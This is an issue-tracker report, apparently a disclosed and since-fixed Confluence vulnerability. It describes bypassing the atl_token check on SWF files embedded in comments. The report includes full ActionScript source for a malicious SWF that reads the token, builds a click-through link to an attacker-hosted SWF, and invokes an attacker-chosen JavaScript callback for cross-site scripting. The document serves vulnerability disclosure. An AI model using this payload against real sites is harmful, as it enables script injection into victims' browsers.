Details
-
Bug
-
Resolution: Fixed
-
Low
-
5.7.4
-
None
-
4.9
-
Description
In confluence comment module user can embed swf file in their comment, confluence are using a `atl_token` parameter on GET HTTP request, if the attacker send the link of .swf file( the value of src on embed tag) to his victim the malicious .SWF won't execute on the victim's browser .
We can bypass this protection by using this.loaderInfo.parameters in malicious .swf, this.loaderInfo.parameters.parameter_name extract the value of your target parameter, in this case it is atl_token , i also inserted a <a> tag in malicous swf file so if the victim clicks the link in our embed swf file the .swf file will be run in the victim's browser.
PAYLOAD
package { import flash.display.Sprite; import flash.text.TextFormat; import flash.text.TextField; import flash.external.ExternalInterface; public class Main extends Sprite { public function Main() { super(); var myFormat:TextFormat = new TextFormat(); myFormat.size = 200; var xcode:String = this.loaderInfo.parameters.atl_token; var myText:TextField = new TextField(); myText.width = 1000; myText.height = 1000; myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>"; addChild(myText); ExternalInterface.call(this.loaderInfo.parameters.callback,"xss"); } } }
Attachments
Issue Links
- mentioned in
-
Page Loading...